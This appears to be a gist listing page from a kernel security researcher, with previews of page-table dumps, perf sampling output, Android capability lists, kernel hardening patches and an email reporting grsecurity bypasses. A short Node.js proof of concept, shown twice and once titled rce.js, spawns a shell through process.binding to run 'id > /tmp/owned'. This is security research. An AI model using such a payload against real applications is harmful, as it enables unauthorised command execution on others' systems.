View gist:b8be219d48084630ec0aed41ee71aee2
0x0 Twux 0x7aa7000
0x0 Twux 0x8b4bf000
0x400000 Twux 0x77c9000
0x400000 P-ux 0x11f46000
0x600000 Twux 0x72da000
0x600000 P-u- 0x11f47000L
0x601000 Pwu- 0x11ec8000L
0x1e00000 Twux 0x79fb000
0x1f13000 Pwu- 0x11f7a000L
0x1f14000 Pwu- 0x11f7b000L
View perf_sample_regs_intr_demo.c
$ ./perf_sample_regs_intr_demo
data_head is at ff0
rax=0xffffffffffffffff rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040b8 rip=0x4005b0
rax=0xfffffffffffffff7 rbp=0xffffa5fc43efff48 rsp=0xffffa5fc43efff28 rip=0xffffffff97c55f1d
rax=0xfffffffffffffff7 rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040b8 rip=0xffffffff9862ce18
rax=0xffff8fc3ba3b79c0 rbp=0xffffa5fc43efff00 rsp=0xffffa5fc43effef0 rip=0xffffffff97c745c9
rax=0xfffffffffffffff7 rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040b8 rip=0xffffffff9862ce18
rax=0x0 rbp=0xffffa5fc43efff00 rsp=0xffffa5fc43effef8 rip=0xffffffff97c75049
rax=0xfffffffffffffff7 rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040b8 rip=0xffffffff9862ce15
rax=0xffffffffffffffff rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040c0 rip=0x4007d5
View gist:6a943fbbd89f81ffa28060dd4f60b390
init root allcaps
ueventd root allcaps
logd CAP_AUDIT_CONTROL CAP_SYSLOG
qseecomd CAP_NET_RAW CAP_SYS_RAWIO CAP_SYS_ADMIN
qseecomd CAP_NET_RAW CAP_SYS_RAWIO CAP_SYS_ADMIN
debuggerd root allcaps
debuggerd64 root allcaps
vold root allcaps
debuggerd64:sig root allcaps
debuggerd:sig root allcaps
View gist:3bac7b2c79cdaaf569c702d9080320ed
var Process = process.binding('process_wrap').Process;
var proc = new Process();
proc.onexit = function(a,b) {};
var env = process.env;
var env_ = [];
for (var key in env) env_.push(key+'='+env[key]);
proc.spawn({file:'/bin/sh',args:['sh','-c','id > /tmp/owned'],cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]});
View 0001-drivers-tty-add-protected_ttys-sysctl.patch
From cd0bd8ae7e4afb8050657b73d65e3ddeccd44b9b Mon Sep 17 00:00:00 2001
From: Jann Horn <jann@thejh.net>
Date: Sat, 12 Dec 2015 02:59:28 +0100
Subject: [PATCH] drivers/tty: add protected_ttys sysctl
This new fs.protected_ttys sysctl can be set to 1 to require
CAP_SYS_ADMIN for the TIOCSTI ioctl (which lets the caller
push input back into the TTY and thereby fake input to other
processes that read from the same TTY).
View rce.js
var Process = process.binding('process_wrap').Process;
var proc = new Process();
proc.onexit = function(a,b) {};
var env = process.env;
var env_ = [];
for (var key in env) env_.push(key+'='+env[key]);
proc.spawn({file:'/bin/sh',args:['sh','-c','id > /tmp/owned'],cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]});
View GRKERNSEC_PTRACE_READEXEC bypasses
Date: Sun, 28 Feb 2016 19:08:22 +0100
From: Jann Horn <jann@thejh.net>
To: Brad Spengler <spender@grsecurity.net>
Subject: GRKERNSEC_PTRACE_READEXEC bypasses
Hi!
While writing some new kernel documentation (not yet public, but will probably
soon be under Documentation/security/ptrace_checks.txt), I noticed that
GRKERNSEC_PTRACE_READEXEC has some issues.
View 0001-fs-allow-unprivileged-chroot.patch
From 712e7f2f67476986498dd8f1db332a62852ebdf0 Mon Sep 17 00:00:00 2001
From: Jann Horn <jann@thejh.net>
Date: Sat, 2 Jan 2016 08:09:19 +0100
Subject: [PATCH] fs: allow unprivileged chroot()
Allow unprivileged processes to chroot() themselves, under the
following conditions:
- The caller must have set NO_NEW_PRIVS to prevent him from
invoking setuid/setgid/setcap executables in the chroot that
View 0001-drivers-tty-require-read-access-for-controlling-term.patch
From 7f1265b917aba4436653aa8e7bf90976b82b77ee Mon Sep 17 00:00:00 2001
From: Jann Horn <jann@thejh.net>
Date: Fri, 14 Aug 2015 17:47:01 +0200
Subject: [PATCH] drivers/tty: require read access for controlling terminal
This is mostly a hardening fix, given that write-only access to other
users' ttys is usually only given through setgid tty executables.
Signed-off-by: Jann Horn <jann@thejh.net>
---
View gist:5b6da6bf36d60c9e6082
https://accounts.google.com/o/oauth2/auth?client_id=243086291405-p1p6s7gq8rtijh3g9cppo85rl5pf17gv.apps.googleusercontent.com&response_type=code&scope=openid%20email&redirect_uri=https://thejh.net/&state=security_token%3D138r5719ru3e1%26url%3Dhttps://thejh.net/&prompt=none